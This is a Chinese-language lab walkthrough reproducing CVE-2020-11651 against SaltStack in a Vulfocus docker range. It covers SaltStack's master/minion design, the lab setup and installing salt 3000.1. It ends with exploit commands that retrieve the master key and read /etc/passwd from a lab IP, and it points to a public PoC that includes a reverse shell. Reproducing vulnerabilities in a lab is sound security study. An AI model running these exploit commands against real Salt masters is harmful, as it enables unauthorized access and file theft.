SaltStack介紹
SaltStack是一款Python開發的開源配置管理工具;
可用來發現、監控、響應、協調、自動化管理本地、混合、雲和IOT資產;
其最主要的差異是主從模式,分為master和minions(slave);
經過配置之后master可以管理成千上萬個minions;
master安裝的是服務端組件salt-mater,minions安裝的是salt-minion;
Salt使用基於ZeroMQ的強大異步網絡拓撲,主要是為實現最快的通信;
Salt Master運行2個網絡服務,ZeroMQ PUB系統,默認運行在4505端口;
ZeroMQ REP系統,用於與Salt Minion進行雙向通信,默認運行在4506端口;
Salt客戶端(salt命令)發送的命令將通過ZeroMQ PUB/SUB廣播給各個Salt Minion。前提是Salt Minion配置了Mater,並且Salt Master通過salt-key命令信任了對應的Salt Minion。建立連接之后,Salt Minion可以接收到廣播命令,並且執行;
PUB/SUB是單向通信,因此一旦廣播結束,Master服務器上的PUB接口就不會再與Minion進行任何通信。Minion在運行命令之后,通過REP端口(4506)將命令的返回數據發回Master。
復現:
1、靶場使用Vulfocus
Vulfocus是一個漏洞集成平台,將漏洞環境 docker 鏡像,放入即可使用,開箱即用
安裝平台(之前安裝好Docker)
docker pull vulfocus/vulfocus:latest
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxx.xxx.xxx vulfocus/vulfocus
這里的IP不要填127.0.0.1 填寫docker的IP(登陸默認admin:admin)
然后添加鏡像,可直徑從系統拉取
2、下載poc:https://github.com/jasperla/CVE-2020-11651-poc
里面介紹有怎么使用和怎么反彈shell 如果端口被轉發 添加參數 -p
3、python支持庫 salt;切記使用linux安裝 ;推薦使用kali ;salt版本推薦3000.1;這里有個大坑;Kali里面pip默認安裝的salt是3000.2版本的;而漏洞版本是3000.1版本 所以就需要我們手動安裝3000.1版本
Salt3000.1下載地址:https://pypi.org/simple/salt (一定要下載3000.1)
將壓縮包拖進kali里面 使用
tar salt-3000.1.tar.gz -xvzf
進行解壓
解壓完開始安裝 進入解壓目錄 運行 python3 setup.py install命令安裝 安裝完即
4、開始運行exp 可以看見key
python3 exploit.py -m 192.168.16.128 -p 17130
5、讀取文件
python3 exploit.py -m 192.168.16.128 -r /etc/passwd -p 17130